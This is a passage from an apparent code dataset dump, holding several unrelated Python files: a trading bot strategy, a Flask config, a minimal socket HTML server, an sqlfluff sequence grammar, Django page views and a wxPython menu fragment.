TO SEE IF WE NEED TO SELL ANY OPEN POSITIONS\n for trade in open_trades:\n if self.current_price > (0.25 * bb_diff) + trade.entry_price or (self.current_price > nine_period and self.current_price > fifteen_period and rsi > 60):\n if self.client:\n\n #### USE CLIENT TO SEND API REQUEST TO CLOSE THE TRADE AT A BIT LOWER THAN THE LAST PRICE\n # ret = self.client.sell_limit(trade.pair, trade.amount, self.current_price - 0.000001)\n ret = self.client.trade_sell(market=trade.pair, order_type=\"MARKET\",\n quantity=trade.amount, time_in_effect=\"FILL_OR_KILL\")\n\n if ret['success'] is True:\n self.output.log(\"Sell order was placed with UUID: \" + ret['result']['uuid'], \"success\")\n profit, total = trade.close(self.current_price)\n self.profit += profit\n self.reserve = total\n else:\n self.output.log(\"Sell order was unsuccessful. Reason: \" + ret['message'], \"error\")\n\n else:\n self.sells.append((self.timestamp, self.current_price))\n profit, total = trade.close(self.current_price)\n self.profit += profit * (1 - self.trading_fee)\n self.reserve = total * (1 - self.trading_fee)\n\n def update_open_trades(self):\n for trade in self.trades:\n\n # Check our stop losses\n if trade.status == \"OPEN\" and trade.stop_loss and self.current_price < trade.stop_loss:\n\n # Use the exchange APIs if we are live with a client\n if self.client:\n\n sell_at = self.current_price - 0.000001\n\n #### USE CLIENT TO SEND API REQUEST TO CLOSE THE STOP LOSS TRADE AT A BIT LOWER THAN THE LAST PRICE\n # ret = self.client.sell_limit(trade.pair, trade.amount, sell_at)\n ret = self.client.trade_sell(market=trade.pair, order_type=\"MARKET\",\n quantity=trade.amount, time_in_effect=\"FILL_OR_KILL\")\n\n if ret['success'] is True:\n self.output.log(\"STOP LOSS! Placed sell order with UUID: \" + ret['result']['uuid'], \"error\")\n profit, total = trade.close(sell_at)\n self.profit += profit * (1 - self.trading_fee)\n self.reserve = total * (1 - self.trading_fee)\n else:\n self.output.log(\"Sell order was unsuccessful. Reason: \" + ret['message'], \"error\")\n else:\n profit, total = trade.close(self.current_price)\n self.sells.append((self.timestamp, self.current_price))\n # self.output.log(\"STOP LOSS! Closed Trade at \" + str(self.current_price) + \" BTC. Profit: \" + str(profit) + \", BTC: \" + str(total), \"error\")\n self.profit += profit * (1 - self.trading_fee)\n self.reserve = total * (1 - self.trading_fee)\n\n def show_positions(self):\n for trade in self.trades:\n trade.show_trade()\n\n def plot_buys(self):\n for timestamp, price in self.buys:\n plt.plot(timestamp, price, 'gx')\n\n def plot_sells(self):\n for timestamp, price in self.sells:\n plt.plot(timestamp, price, 'rx')\n\nfrom indicators.backtesting_indicators import BacktestingIndicators\nfrom decision import Decision\n\n'''\nBackTesting Strategy\n'''\nclass BacktestingStrategy(object):\n def __init__(self, pair, capital, buy_strategy, sell_strategy, trading_fee=0, stop_loss=0):\n self.output = Logger()\n self.prices = []\n self.trades = []\n self.sells = []\n self.buys = []\n self.max_trades_at_once = 1\n self.indicators = BacktestingIndicators\n self.profit = 0\n self.pair = pair\n self.reserve = capital\n self.buy_strategy = buy_strategy\n self.sell_stategy = sell_strategy\n self.trading_fee = trading_fee\n self.stop_loss = stop_loss\n\n '''\n Runs our backtesting strategy on the set of backtesting candlestick data\n '''\n def run(self, candlesticks):\n\n # Samples a random price within the range [candlestick.open, candlestick.close]\n sample_price = lambda op, close: random.uniform(min(op, close), max(op, close))\n\n self.prices = [sample_price(candle.open, candle.close) for candle in candlesticks]\n\n rsi = self.indicators.historical_rsi(self.prices)\n nine_period = self.indicators.historical_moving_average(self.prices, 9)\n fifteen_period = self.indicators.historical_moving_average(self.prices, 15)\n bb1, bb2 = self.indicators.historical_bollinger_bands(self.prices)\n bb_diff = bb1 - bb2\n\n\n for i in range(len(self.prices)):\n\n decision = Decision({'currentprice': self.prices[i], 'rsi': rsi[i], 'movingaverage9': nine_period[i], 'movingaverage15': fifteen_period[i]})\n\n open_trades = [trade for trade in self.trades if trade.status == 'OPEN']\n\n ### CHECK TO SEE IF WE CAN OPEN A BUY POSITION\n if len(open_trades) < self.max_trades_at_once:\n if decision.should_buy(self.buy_strategy):\n assert self.reserve > 0\n\n self.buys.append((i, self.prices[i]))\n new_trade = Trade(self.pair, self.prices[i], self.reserve * (1 - self.trading_fee),\n stop_loss=self.stop_loss)\n self.reserve = 0\n self.trades.append(new_trade)\n\n ### CHECK TO SEE IF WE NEED TO SELL ANY OPEN POSITIONS\n for trade in open_trades:\n if decision.should_sell(self.sell_stategy):\n\n self.sells.append((i, self.prices[i]))\n profit, total = trade.close(self.prices[i])\n self.profit += profit * (1 - self.trading_fee)\n self.reserve = total * (1 - self.trading_fee)\n\n ### CHECK TO SEE IF WE HAVE ACTIVATED A STOP LOSS\n for trade in self.trades:\n\n # Check our stop losses\n if trade.status == \"OPEN\" and trade.stop_loss and self.prices[i] < trade.stop_loss:\n profit, total = trade.close(self.prices[i])\n self.sells.append((i, self.prices[i]))\n self.profit += profit * (1 - self.trading_fee)\n self.reserve = total * (1 - self.trading_fee)\n\n def show_positions(self):\n for trade in self.trades:\n trade.show_trade()\n","sub_path":"backend/bot/strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":10780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"633135593","text":"\"\"\"参数管理\"\"\"\n\nfrom src.commons.model_resource import MongoModelResource\nfrom src.models import BlackWhiteList\n\n\nclass BlackWhiteListAPI(MongoModelResource):\n \"\"\"通用参数字典\"\"\"\n\n model = BlackWhiteList\n filter_fields = [\n [\"product\", \"==\", \"product\", str],\n [\"list_type\", \"==\", \"list_type\", str],\n [\"data\", \"==\", \"data\", str],\n [\"is_allow\", \"==\", \"is_allow\", bool],\n ]\n","sub_path":"xxw/fraud_api/src/modules/black_white_list.py","file_name":"black_white_list.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"347192441","text":"def count_vowels(word):\n vowels = 'aeiou'\n total = 0\n for vowel in vowels:\n total += word.count(vowel)\n\n return total\n\nprint(count_vowels('apple'))\nprint(count_vowels('banana'))\n\n\n\n#2번\n# (4번) -> 오류가 발생 안함, 공백 제거\n\n\n#3번\n#이중 포문\ndef only_square_area(value1, value2):\n area_list = []\n for v1 in value1:\n for v2 in value2:\n if v1 == v2:\n area_list.append(v1**2)\n \n return area_list\n\nprint(only_square_area([32,55,63],[13,32,42,55]))\n\n# list comprehension\n # area_list = [v1**2 for v1 in value1 for v2 in value2 if v1 == v2]\n\n # return area_list\n\n\n\ndef get_dict_avg(score_dict):\n return sum(score_dict.values()) / len(score_dict)\n\n# total = 0\n# length = 0\n# for score in score_dict.values():\n# total += score\n# length += 1\n\n# return total / length\n\navg = get_dict_avg({\n 'python': 80,\n 'algorithm': 90,\n 'django': 89,\n 'web': 83,\n})\nprint(avg)\n\n\n\ndef count_blood(blood_list):\n blood_dict = {}\n #1\n # for blood in blood_list:\n # if blood_dict.get(blood):\n # blood_dict[blood] += 1\n # else:\n # blood_dict[blood] = 1\n\n\n #2\n for blood in blood_list:\n blood_dict[blood] = blood_dict.get(blood, 0) + 1\n\n\n return blood_dict\n\nresult = count_blood([\n 'A','B','A','O','AB','AB',\n 'O','A','B','O','B','AB',\n])\nprint(count_blood(result))\n\n\n\n\n","sub_path":"trainning/0726hwsans.py","file_name":"0726hwsans.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"470121272","text":"import os\nfrom xml.etree import cElementTree as ET\n\nfrom malcolm.compat import et_to_string\nfrom malcolm.core import REQUIRED, method_takes\nfrom malcolm.core.vmetas import StringMeta\nfrom malcolm.parts.builtin.childpart import ChildPart\nfrom malcolm.controllers.runnablecontroller import RunnableController\nfrom malcolm.parts.ADCore.hdfwriterpart import CalculatedNDAttributeDatasetInfo\n\n\nclass StatsPluginPart(ChildPart):\n\n @RunnableController.ReportStatus\n def report_info(self, _):\n return [CalculatedNDAttributeDatasetInfo(name=\"sum\", attr=\"StatsTotal\")]\n\n def _make_attributes_xml(self):\n # Make a root element with an NXEntry\n root_el = ET.Element(\"Attributes\")\n ET.SubElement(\n root_el, \"Attribute\", addr=\"0\", datatype=\"DOUBLE\", type=\"PARAM\",\n description=\"Sum of the array\", name=\"StatsTotal\", source=\"TOTAL\",\n )\n xml = et_to_string(root_el)\n return xml\n\n @RunnableController.Configure\n @method_takes(\n \"filePath\", StringMeta(\"File path to write data to\"), REQUIRED)\n def configure(self, task, completed_steps, steps_to_do, part_info, params):\n file_dir, filename = params.filePath.rsplit(os.sep, 1)\n fs = task.put_many_async(self.child, dict(\n enableCallbacks=True,\n computeStatistics=True))\n xml = self._make_attributes_xml()\n attributes_filename = os.path.join(\n file_dir, \"%s-attributes.xml\" % self.params.mri)\n open(attributes_filename, \"w\").write(xml)\n fs += task.put_async(self.child[\"attributesFile\"], attributes_filename)\n task.wait_all(fs)\n","sub_path":"malcolm/parts/ADCore/statspluginpart.py","file_name":"statspluginpart.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"352585186","text":"import os\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\nDEBUG = False\nDATABASE = 'vendor_portal.db'\nWTF_CSRF_ENABLED = True\nSECRET_KEY = 'my_precious'\nPOSTS_PER_PAGE = 40\n# define the full path of the database\nDATABASE_PATH = os.path.join(basedir, DATABASE)\nSQLALCHEMY_DATABASE_URI = 'sqlite:///' + DATABASE_PATH\n\nMAX_SEARCH_RESULTS = 50\n\nINVENTORY_FILES = os.path.realpath('project/INVENTORY_FILES/')\nUPLOADED_FILES = os.path.realpath('project/UPLOADED_FILES/')\nMASTER_INVENTORY = os.path.realpath('project/MASTER_INVENTORY/')\n\nALLOWED_EXTENSIONS = set(['csv',])","sub_path":"project/_config.py","file_name":"_config.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"313056332","text":"import socket\r\nimport tkinter as tk\r\nimport keyboard\r\n\r\nhosting = False\r\n\r\ndefport = 80\r\n\r\ndefhtml = \"\"\"\r\n\r\n\r\n!!TITLE!!\r\n\r\n\r\n!!BODY!!\r\n\r\n\"\"\"\r\n\r\ndef compilecode(title, body, font=\"Arial\"):\r\n print(\"Compiling...\")\r\n return bytes(defhtml.replace(\"!!TITLE!!\", title).replace(\"!!BODY!!\", body).replace(\"!!FONT!!\", font), \"UTF-8\")\r\n\r\nhtml = compilecode(\"AC88 Web\",\r\n \"

AC88 Web

Error 204

This site has been started without any code. If you are the developer please check your website editor.

\")\r\n\r\ndef run(port, html, onlylh=False):\r\n if not type(html)==bytes:\r\n print(\"Expected html in b'' not ''\")\r\n return\r\n sock = socket.socket()\r\n sock.bind(('', port))\r\n print(\"Waiting for client...\")\r\n sock.listen(5)\r\n client, address = sock.accept()\r\n print(\"Incoming:\", address)\r\n if not address[0]==\"127.0.0.1\" and onlylh:\r\n print(\"Aborting run. Non-localhost user requested.\")\r\n return\r\n print(client.recv(1024))\r\n print()\r\n client.send(b'HTTP/1.0 200 OK\\r\\n')\r\n client.send(b\"Content-Type: text/html\\r\\n\\r\\n\")\r\n client.send(html)\r\n client.close()\r\n print(\"Answering ...\")\r\n print(\"Finished.\")\r\n sock.close()\r\n\r\ndef aborthost(e=\"\"):\r\n print(\"Aborting host...\")\r\n global hosting\r\n keyboard.unhook_all()\r\n hosting = False\r\n\r\ndef host(port, html, ek=\"h\"):\r\n print(\"Hosting...\")\r\n global hosting\r\n hosting = True\r\n if not ek==None:\r\n keyboard.on_press_key(\"h\", aborthost)\r\n while hosting:\r\n run(port, html)\r\n","sub_path":"ac88web/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"349627216","text":"__author__ = [\"Francisco Clavero\"]\n__email__ = [\"fcoclavero32@gmail.com\"]\n__status__ = \"Prototype\"\n\n\n\"\"\" Project settings and parameters. \"\"\"\n\n\nimport os\n\nfrom dotenv import load_dotenv\n\n\nload_dotenv()\n\ntry:\n ROOT_DIR = os.environ[\"ROOT_DIR\"]\nexcept KeyError:\n ROOT_DIR = os.path.dirname(os.path.realpath(__file__))\n\nCHECKPOINT_NAME_FORMAT = \"%y-%m-%dT%H-%M\"\n\nDATA_DIR = os.environ[\"DATA_DIR\"]\n\nDATA_SOURCES = {\n \"sketchy-photos\": {\n \"root\": os.path.join(DATA_DIR, \"sketchy\"),\n \"images\": os.path.join(DATA_DIR, \"sketchy\", \"photo\", \"tx_000000000000\"), # 12500\n \"dimensions\": (256, 256),\n \"language\": \"en\",\n },\n \"sketchy-sketches\": {\n \"root\": os.path.join(DATA_DIR, \"sketchy\"),\n \"images\": os.path.join(DATA_DIR, \"sketchy\", \"sketch\", \"tx_000000000000\"), # 75481\n \"dimensions\": (256, 256),\n \"language\": \"en\",\n },\n \"sketchy-test-photos\": {\n \"root\": os.path.join(DATA_DIR, \"sketchy_test\"),\n \"images\": os.path.join(DATA_DIR, \"sketchy_test_multimodal\", \"photo\"), # 1250\n \"dimensions\": (256, 256),\n \"language\": \"en\",\n },\n \"sketchy-test-photos-multimodal\": {\n \"root\": os.path.join(DATA_DIR, \"sketchy_test_multimodal\"),\n \"images\": os.path.join(DATA_DIR, \"sketchy_test_multimodal\", \"photo\"), # 1250\n \"dimensions\": (256, 256),\n \"language\": \"en\",\n },\n \"sketchy-test-sketches\": {\n \"root\": os.path.join(DATA_DIR, \"sketchy_test\"),\n \"images\": os.path.join(DATA_DIR, \"sketchy_test_multimodal\", \"sketch\"), # 1250\n \"dimensions\": (256, 256),\n \"language\": \"en\",\n },\n \"sketchy-test-sketches-multimodal\": {\n \"root\": os.path.join(DATA_DIR, \"sketchy_test_multimodal\"),\n \"images\": os.path.join(DATA_DIR, \"sketchy_test_multimodal\", \"sketch\"), # 1250\n \"dimensions\": (256, 256),\n \"language\": \"en\",\n },\n \"sample_vectors\": {\"pickle\": os.path.join(DATA_DIR, \"sample-vectors.pickle\"), \"dimensions\": (100000, 100)},\n \"sample_vectors_one-hot\": {\n \"pickle\": os.path.join(DATA_DIR, \"sample-vectors-one-hot.pickle\"),\n \"dimensions\": (100000, 100),\n },\n}\n","sub_path":"vscvs/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"470139198","text":"\"\"\"Sequence and Bracketed Grammars.\"\"\"\n\nfrom typing import Optional, List, Tuple, cast\n\nfrom sqlfluff.core.errors import SQLParseError\n\nfrom sqlfluff.core.parser.segments import (\n BaseSegment,\n Indent,\n Dedent,\n allow_ephemeral,\n BracketedSegment,\n MetaSegment,\n)\nfrom sqlfluff.core.parser.helpers import trim_non_code_segments, check_still_complete\nfrom sqlfluff.core.parser.match_result import MatchResult\nfrom sqlfluff.core.parser.match_wrapper import match_wrapper\nfrom sqlfluff.core.parser.context import ParseContext\nfrom sqlfluff.core.parser.grammar.base import (\n BaseGrammar,\n cached_method_for_parse_context,\n)\nfrom sqlfluff.core.parser.grammar.conditional import Conditional\nfrom os import getenv\n\n\nclass Sequence(BaseGrammar):\n \"\"\"Match a specific sequence of elements.\"\"\"\n\n test_env = getenv(\"SQLFLUFF_TESTENV\", \"\")\n\n @cached_method_for_parse_context\n def simple(self, parse_context: ParseContext, crumbs=None) -> Optional[List[str]]:\n \"\"\"Does this matcher support a uppercase hash matching route?\n\n Sequence does provide this, as long as the *first* non-optional\n element does, *AND* and optional elements which preceded it also do.\n \"\"\"\n simple_buff = []\n for opt in self._elements:\n simple = opt.simple(parse_context=parse_context, crumbs=crumbs)\n if not simple:\n return None\n simple_buff += simple\n\n if not opt.is_optional():\n # We found our first non-optional element!\n return simple_buff\n # If *all* elements are optional AND simple, I guess it's also simple.\n return simple_buff\n\n @match_wrapper()\n @allow_ephemeral\n def match(self, segments, parse_context):\n \"\"\"Match a specific sequence of elements.\"\"\"\n if isinstance(segments, BaseSegment):\n segments = tuple(segments) # pragma: no cover TODO?\n\n matched_segments = MatchResult.from_empty()\n unmatched_segments = segments\n\n # Buffers of uninstantiated meta segments.\n meta_pre_nc = ()\n meta_post_nc = ()\n early_break = False\n\n for idx, elem in enumerate(self._elements):\n # Check for an early break.\n if early_break:\n break\n\n while True:\n # Consume non-code if appropriate\n if self.allow_gaps:\n pre_nc, mid_seg, post_nc = trim_non_code_segments(\n unmatched_segments\n )\n else:\n pre_nc = ()\n mid_seg = unmatched_segments\n post_nc = ()\n\n # Is it an indent or dedent?\n if elem.is_meta:\n # Elements with a negative indent value come AFTER\n # the whitespace. Positive or neutral come BEFORE.\n if elem.indent_val < 0:\n meta_post_nc += (elem(),)\n else:\n meta_pre_nc += (elem(),)\n break\n\n # Is it a conditional? If so is it active\n if isinstance(elem, Conditional) and not elem.is_enabled(parse_context):\n # If it's not active, skip it.\n break\n\n if len(pre_nc + mid_seg + post_nc) == 0:\n # We've run our of sequence without matching everything.\n # Do only optional or meta elements remain?\n if all(\n e.is_optional() or e.is_meta or isinstance(e, Conditional)\n for e in self._elements[idx:]\n ):\n # then it's ok, and we can return what we've got so far.\n # No need to deal with anything left over because we're at the\n # end, unless it's a meta segment.\n\n # We'll add those meta segments after any existing ones. So\n # the go on the meta_post_nc stack.\n for e in self._elements[idx:]:\n # If it's meta, instantiate it.\n if e.is_meta:\n meta_post_nc += (e(),) # pragma: no cover TODO?\n # If it's conditional and it's enabled, match it.\n if isinstance(e, Conditional) and e.is_enabled(\n parse_context\n ):\n meta_match = e.match(tuple(), parse_context)\n if meta_match:\n meta_post_nc += meta_match.matched_segments\n\n # Early break to exit via the happy match path.\n early_break = True\n break\n else:\n # we've got to the end of the sequence without matching all\n # required elements.\n return MatchResult.from_unmatched(segments)\n else:\n # We've already dealt with potential whitespace above, so carry on\n # to matching\n with parse_context.deeper_match() as ctx:\n elem_match = elem.match(mid_seg, parse_context=ctx)\n\n if elem_match.has_match():\n # We're expecting mostly partial matches here, but complete\n # matches are possible. Don't be greedy with whitespace!\n matched_segments += (\n meta_pre_nc\n + pre_nc\n + meta_post_nc\n + elem_match.matched_segments\n )\n meta_pre_nc = ()\n meta_post_nc = ()\n unmatched_segments = elem_match.unmatched_segments + post_nc\n # Each time we do this, we do a sense check to make sure we\n # haven't dropped anything. (Because it's happened before!).\n if self.test_env:\n check_still_complete(\n segments,\n matched_segments.matched_segments,\n unmatched_segments,\n )\n # Break out of the while loop and move to the next element.\n break\n else:\n # If we can't match an element, we should ascertain whether it's\n # required. If so then fine, move on, but otherwise we should\n # crash out without a match. We have not matched the sequence.\n if elem.is_optional():\n # This will crash us out of the while loop and move us\n # onto the next matching element\n break\n else:\n return MatchResult.from_unmatched(segments)\n\n # If we get to here, we've matched all of the elements (or skipped them)\n # but still have some segments left (or perhaps have precisely zero left).\n # In either case, we're golden. Return successfully, with any leftovers as\n # the unmatched elements. Meta all go at the end regardless of wny trailing\n # whitespace.\n\n return MatchResult(\n BaseSegment._position_segments(\n matched_segments.matched_segments + meta_pre_nc + meta_post_nc,\n ),\n unmatched_segments,\n )\n\n\nclass Bracketed(Sequence):\n \"\"\"Match if a bracketed sequence, with content that matches one of the elements.\n\n Note that the contents of the Bracketed Expression are treated as an expected\n sequence.\n\n Changelog:\n - Post 0.3.2: Bracketed inherits from Sequence and anything within\n the the `Bracketed()` expression is treated as a sequence. For the\n content of the Brackets, we call the `match()` method of the sequence\n grammar.\n - Post 0.1.0: Bracketed was separate from sequence, and the content\n of the expression were treated as options (like OneOf).\n - Pre 0.1.0: Bracketed inherited from Sequence and simply added\n brackets to that sequence.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n # Store the bracket type. NB: This is only\n # hydrated into segments at runtime.\n self.bracket_type = kwargs.pop(\"bracket_type\", \"round\")\n self.bracket_pairs_set = kwargs.pop(\"bracket_pairs_set\", \"bracket_pairs\")\n # Allow optional override for special bracket-like things\n self.start_bracket = kwargs.pop(\"start_bracket\", None)\n self.end_bracket = kwargs.pop(\"end_bracket\", None)\n super().__init__(*args, **kwargs)\n\n @cached_method_for_parse_context\n def simple(self, parse_context: ParseContext, crumbs=None) -> Optional[List[str]]:\n \"\"\"Does this matcher support a uppercase hash matching route?\n\n Bracketed does this easily, we just look for the bracket.\n \"\"\"\n start_bracket, _, _ = self.get_bracket_from_dialect(parse_context)\n return start_bracket.simple(parse_context=parse_context, crumbs=crumbs)\n\n def get_bracket_from_dialect(self, parse_context):\n \"\"\"Rehydrate the bracket segments in question.\"\"\"\n for bracket_type, start_ref, end_ref, persists in parse_context.dialect.sets(\n self.bracket_pairs_set\n ):\n if bracket_type == self.bracket_type:\n start_bracket = parse_context.dialect.ref(start_ref)\n end_bracket = parse_context.dialect.ref(end_ref)\n break\n else: # pragma: no cover\n raise ValueError(\n \"bracket_type {!r} not found in bracket_pairs of {!r} dialect.\".format(\n self.bracket_type, parse_context.dialect.name\n )\n )\n return start_bracket, end_bracket, persists\n\n @match_wrapper()\n @allow_ephemeral\n def match(\n self, segments: Tuple[\"BaseSegment\", ...], parse_context: ParseContext\n ) -> MatchResult:\n \"\"\"Match if a bracketed sequence, with content that matches one of the elements.\n\n 1. work forwards to find the first bracket.\n If we find something other that whitespace, then fail out.\n 2. Once we have the first bracket, we need to bracket count forward to find its\n partner.\n 3. Assuming we find its partner then we try and match what goes between them\n using the match method of Sequence.\n If we match, great. If not, then we return an empty match.\n If we never find its partner then we return an empty match but should\n probably log a parsing warning, or error?\n\n \"\"\"\n # Trim ends if allowed.\n if self.allow_gaps:\n pre_nc, seg_buff, post_nc = trim_non_code_segments(segments)\n else:\n seg_buff = segments # pragma: no cover TODO?\n\n # Rehydrate the bracket segments in question.\n # bracket_persists controls whether we make a BracketedSegment or not.\n start_bracket, end_bracket, bracket_persists = self.get_bracket_from_dialect(\n parse_context\n )\n # Allow optional override for special bracket-like things\n start_bracket = self.start_bracket or start_bracket\n end_bracket = self.end_bracket or end_bracket\n\n # Are we dealing with a pre-existing BracketSegment?\n if seg_buff[0].is_type(\"bracketed\"):\n # NOTE: We copy the original segment here because otherwise we will begin to\n # edit a _reference_ and not a copy - and that may lead to unused matches\n # leaking out. https://github.com/sqlfluff/sqlfluff/issues/3277\n seg: BracketedSegment = cast(BracketedSegment, seg_buff[0].copy())\n # Check it's of the right kind of bracket\n if not start_bracket.match(seg.start_bracket, parse_context):\n # Doesn't match - return no match\n return MatchResult.from_unmatched(segments)\n\n content_segs = seg.segments[len(seg.start_bracket) : -len(seg.end_bracket)]\n bracket_segment = seg\n trailing_segments = seg_buff[1:]\n # Otherwise try and match the segments directly.\n else:\n # Look for the first bracket\n with parse_context.deeper_match() as ctx:\n start_match = start_bracket.match(seg_buff, parse_context=ctx)\n if start_match:\n seg_buff = start_match.unmatched_segments\n else:\n # Can't find the opening bracket. No Match.\n return MatchResult.from_unmatched(segments)\n\n # Look for the closing bracket\n content_segs, end_match, _ = self._bracket_sensitive_look_ahead_match(\n segments=seg_buff,\n matchers=[end_bracket],\n parse_context=parse_context,\n start_bracket=start_bracket,\n end_bracket=end_bracket,\n bracket_pairs_set=self.bracket_pairs_set,\n )\n if not end_match: # pragma: no cover\n raise SQLParseError(\n \"Couldn't find closing bracket for opening bracket.\",\n segment=start_match.matched_segments[0],\n )\n\n # Construct a bracket segment\n bracket_segment = BracketedSegment(\n segments=(\n start_match.matched_segments\n + content_segs\n + end_match.matched_segments\n ),\n start_bracket=start_match.matched_segments,\n end_bracket=end_match.matched_segments,\n )\n trailing_segments = end_match.unmatched_segments\n\n # Then trim whitespace and deal with the case of non-code content e.g. \"( )\"\n if self.allow_gaps:\n pre_segs, content_segs, post_segs = trim_non_code_segments(content_segs)\n else: # pragma: no cover TODO?\n pre_segs = ()\n post_segs = ()\n\n # If we've got a case of empty brackets check whether that is allowed.\n if not content_segs:\n if not self._elements or (\n all(e.is_optional() for e in self._elements)\n and (self.allow_gaps or (not pre_segs and not post_segs))\n ):\n return MatchResult(\n (bracket_segment,)\n if bracket_persists\n else bracket_segment.segments,\n trailing_segments,\n )\n else:\n return MatchResult.from_unmatched(segments)\n\n # Match the content using super. Sequence will interpret the content of the\n # elements.\n with parse_context.deeper_match() as ctx:\n content_match = super().match(content_segs, parse_context=ctx)\n\n # We require a complete match for the content (hopefully for obvious reasons)\n if content_match.is_complete():\n # Reconstruct the bracket segment post match.\n # We need to realign the meta segments so the pos markers are correct.\n # Have we already got indents?\n meta_idx = None\n for idx, seg in enumerate(bracket_segment.segments):\n if (\n seg.is_meta\n and cast(MetaSegment, seg).indent_val > 0\n and not cast(MetaSegment, seg).is_template\n ):\n meta_idx = idx\n break\n # If we've already got indents, don't add more.\n if meta_idx:\n bracket_segment.segments = BaseSegment._position_segments(\n bracket_segment.start_bracket\n + pre_segs\n + content_match.all_segments()\n + post_segs\n + bracket_segment.end_bracket\n )\n # Append some indent and dedent tokens at the start and the end.\n else:\n bracket_segment.segments = BaseSegment._position_segments(\n # NB: The nc segments go *outside* the indents.\n bracket_segment.start_bracket\n + (Indent(),) # Add a meta indent here\n + pre_segs\n + content_match.all_segments()\n + post_segs\n + (Dedent(),) # Add a meta indent here\n + bracket_segment.end_bracket\n )\n return MatchResult(\n (bracket_segment,) if bracket_persists else bracket_segment.segments,\n trailing_segments,\n )\n # No complete match. Fail.\n else:\n return MatchResult.from_unmatched(segments)\n","sub_path":"src/sqlfluff/core/parser/grammar/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":17109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"27713248","text":"#-*- coding: utf-8 -*-\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.shortcuts import get_object_or_404, render_to_response\nfrom django.template import RequestContext\nfrom django.core.mail import EmailMessage\nfrom django.template.loader import render_to_string\nfrom django.conf import settings\nfrom django.utils.html import strip_tags\nfrom django.contrib import messages\n\nfrom forms import MessageForm\nfrom models import Page, News\n\nfrom datetime import datetime\nfrom page.forms import DefinitionErrorList\nfrom shop.models import ProductGroup\n\n\ndef render_to(tmpl):\n def renderer(func):\n def wrapper(request, *args, **kw):\n output = func(request, *args, **kw)\n if not isinstance(output, dict):\n return output\n output['settings'] = settings\n return render_to_response(tmpl, output, context_instance=RequestContext(request))\n return wrapper\n return renderer\n\n\n@render_to('index.html')\ndef home(request):\n return {'p': get_object_or_404(Page, url='index'), 'groups': ProductGroup.objects.filter(productgroup=None)}\n\n@render_to('contacts.html')\ndef contacts(request):\n return {'p': get_object_or_404(Page, url='contacts'), 'MAPS_API_KEY': settings.MAPS_API_KEY}\n\n@render_to('search.html')\ndef error404(request):\n return {'p':Page(title=u'Такой страницы не найдено', content=u'Такой страницы не существует. Воспользуйтесь поиском по сайту')}\n\n@render_to('search.html')\ndef error403(request):\n return {'p':Page(title=u'Недостаточно прав для совершения операции', content=u'Недостаточно прав для совершения операции.')}\n\n@render_to('search.html')\ndef error500(request):\n return {'p':Page(title=u'Ошибка сервера', content=u'Произошла серверная ошибка.')}\n\n@render_to('search.html')\ndef search(request):\n return {'p':Page.objects.get(url=\"search\"), 'query': request.GET.get('query', ''), 'SEARCH_API_KEY': settings.SEARCH_API_KEY}\n\n@render_to('page.html')\ndef page(request, url):\n return {'p':get_object_or_404(Page, url=url)}\n\n@render_to('newsall.html')\ndef newslist(request, page=1):\n if(page is None):\n page = 1\n else:\n page = int(page)\n paginator = Paginator(News.objects.filter(date__lte=datetime.now()), 5)\n try:\n newspage = paginator.page(page)\n except PageNotAnInteger:\n newspage = paginator.page(1)\n except EmptyPage:\n newspage = paginator.page(paginator.num_pages)\n\n return {\n 'newspage': newspage,\n 'p': Page(title=\"Новости\", url=\"news\"),\n }\n\n@render_to('news.html')\ndef newsread(request, newsdate, url):\n news = get_object_or_404(News, date=newsdate, url=url)\n return {'news':news, \"p\": Page(title=news.title, keywords=news.keywords, meta_description=strip_tags(news.smallcontent))}\n\n@render_to('sitemap.html')\ndef sitemap(request):\n return {'p': get_object_or_404(Page, url='sitemap'),\n \"pages\": Page.objects.all().exclude(url=\"order\"),\n \"groups\": ProductGroup.objects.filter(productgroup=None)}\n\n@render_to('blocks/message-form.html')\ndef message(request):\n if request.method == \"POST\":\n form = MessageForm(request.POST, error_class = DefinitionErrorList)\n if form.is_valid():\n try:\n msg=form.save(commit=False)\n msg.save()\n message = render_to_string('message_email.txt', {'msg':msg})\n send_to = [manager[1] for manager in settings.MANAGERS]\n email = EmailMessage(u\"Сообщение с сайта temp-msk\", message, u'ТЕМП ', send_to)\n email.send()\n messages.success(request, u'Сообщение отправлено специалистам компании')\n return {'form': MessageForm()}\n except :\n messages.error(request, u'При отправке произошла ошибка. Пожалуйста, повторите попытку позднее.')\n else:\n form = MessageForm()\n\n return {'form': form}","sub_path":"page/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"364873607","text":"import wx\nimport os\n\nfrom ..lib import MenuPanelSwitchButton\nfrom ..lib import ScrolledPanel\nfrom ..lib import SimpleButton\nfrom ..lib import ConfigColorSwitcher\nfrom ..lib import ScaledStaticText\nfrom ..lib import CheckBox\n\nfrom .widgetdescriptors import WidgetsList\n\n\nPATH = __file__.replace('core/menu.py', 'widgets/')\n\n\nclass MenuPanel(wx.Panel):\n \"\"\"Container for menu related panels.\"\"\"\n\n def __init__(self, parent, config, manager):\n super().__init__(parent=parent, name='menu')\n\n self.parent = parent\n self.config = config\n 